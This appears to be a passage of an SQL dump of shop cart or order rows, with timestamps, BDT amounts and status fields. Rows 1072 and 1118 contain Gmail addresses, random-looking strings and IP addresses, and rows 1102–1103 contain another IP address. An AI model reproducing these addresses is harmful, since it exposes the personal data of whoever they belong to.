(1071, 1, '2026-04-18 12:24:27', '2026-04-18 12:24:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1072, 1, '2026-04-18 13:35:38', '2026-04-18 13:35:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 134, NULL, 1, 'r.o.c.u.ye.x.u.y559@gmail.com', NULL, 'CaxjBqmIRIGhEiGuNbXOPUp', NULL, 'xqZFrjHSRTBLNDBuxGjAVrL', NULL, NULL, NULL, 1, 0, '45.84.107.74', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1073, 1, '2026-04-18 19:19:28', '2026-04-18 19:19:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1074, 1, '2026-04-18 20:50:12', '2026-04-18 20:50:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1075, 1, '2026-04-18 23:02:54', '2026-04-18 23:02:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1076, 1, '2026-04-19 03:10:26', '2026-04-19 03:10:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1077, 1, '2026-04-19 04:30:14', '2026-04-19 04:30:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1078, 1, '2026-04-19 05:08:13', '2026-04-19 05:08:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1079, 1, '2026-04-19 13:21:58', '2026-04-19 13:22:05', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1080, 1, '2026-04-19 13:40:38', '2026-04-19 13:40:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1081, 1, '2026-04-19 18:45:29', '2026-04-19 18:45:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1082, 1, '2026-04-19 18:45:37', '2026-04-19 18:45:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1083, 1, '2026-04-19 18:45:44', '2026-04-19 18:45:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1084, 1, '2026-04-19 18:45:52', '2026-04-19 18:45:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1085, 1, '2026-04-19 18:46:01', '2026-04-19 18:46:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1086, 1, '2026-04-19 18:46:09', '2026-04-19 18:46:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1087, 1, '2026-04-19 18:46:16', '2026-04-19 18:46:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1088, 1, '2026-04-19 21:46:04', '2026-04-19 21:46:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1089, 1, '2026-04-19 23:03:03', '2026-04-19 23:03:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1090, 1, '2026-04-20 01:06:36', '2026-04-20 01:06:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1091, 1, '2026-04-20 06:06:41', '2026-04-20 06:06:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1092, 1, '2026-04-20 06:10:38', '2026-04-20 06:10:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1093, 1, '2026-04-20 08:32:49', '2026-04-20 08:32:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1094, 1, '2026-04-20 15:17:51', '2026-04-20 15:17:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1095, 1, '2026-04-20 18:03:15', '2026-04-20 18:03:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1096, 1, '2026-04-20 18:52:06', '2026-04-20 18:52:13', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1097, 1, '2026-04-20 21:46:15', '2026-04-20 21:46:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1098, 1, '2026-04-20 22:18:39', '2026-04-20 22:18:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1099, 1, '2026-04-21 03:19:23', '2026-04-21 03:19:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1100, 1, '2026-04-21 05:42:35', '2026-04-21 05:42:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1101, 1, '2026-04-21 05:56:36', '2026-04-21 05:56:42', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1102, 1, '2026-04-21 09:34:53', '2026-04-21 09:34:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '49.144.114.160', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(1103, 1, '2026-04-21 09:35:02', '2026-04-21 09:35:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '49.144.114.160', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(1104, 1, '2026-04-21 10:46:43', '2026-04-21 10:46:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1105, 1, '2026-04-21 12:29:25', '2026-04-21 12:29:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1106, 1, '2026-04-21 12:29:35', '2026-04-21 12:29:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1107, 1, '2026-04-21 12:29:44', '2026-04-21 12:29:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1108, 1, '2026-04-21 12:29:47', '2026-04-21 12:29:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1109, 1, '2026-04-21 12:29:49', '2026-04-21 12:29:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1110, 1, '2026-04-21 12:29:53', '2026-04-21 12:29:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1111, 1, '2026-04-21 12:30:02', '2026-04-21 12:30:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1112, 1, '2026-04-21 12:30:11', '2026-04-21 12:30:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1113, 1, '2026-04-21 12:30:14', '2026-04-21 12:30:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1114, 1, '2026-04-21 12:30:21', '2026-04-21 12:30:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1115, 1, '2026-04-21 12:30:30', '2026-04-21 12:30:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1116, 1, '2026-04-21 12:40:33', '2026-04-21 12:40:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1117, 1, '2026-04-21 12:57:32', '2026-04-21 12:57:33', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1118, 1, '2026-04-21 14:27:27', '2026-04-21 14:27:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 135, NULL, 1, 'm.ohu.qu.b.4.1.1@gmail.com', NULL, 'xmWoevRAgatyDfGZnxhYh', NULL, 'pprBYaPwhTTzdJtyMxE', NULL, NULL, NULL, 1, 0, '107.189.2.108', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1119, 1, '2026-04-21 20:20:37', '2026-04-21 20:20:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1120, 1, '2026-04-21 22:02:28', '2026-04-21 22:02:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1121, 1, '2026-04-22 03:16:20', '2026-04-22 03:16:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1122, 1, '2026-04-22 07:36:00', '2026-04-22 07:36:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1123, 1, '2026-04-22 10:34:33', '2026-04-22 10:34:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1124, 1, '2026-04-22 15:09:20', '2026-04-22 15:09:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1125, 1, '2026-04-22 15:09:25', '2026-04-22 15:09:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1126, 1, '2026-04-22 15:09:29', '2026-04-22 15:09:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1127, 1, '2026-04-22 15:10:36', '2026-04-22 15:11:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1128, 1, '2026-04-22 15:11:52', '2026-04-22 15:11:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1129, 1, '2026-04-22 15:12:04', '2026-04-22 15:12:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1130, 1, '2026-04-22 15:12:05', '2026-04-22 15:12:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1131, 1, '2026-04-22 17:12:21', '2026-04-22 17:12:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
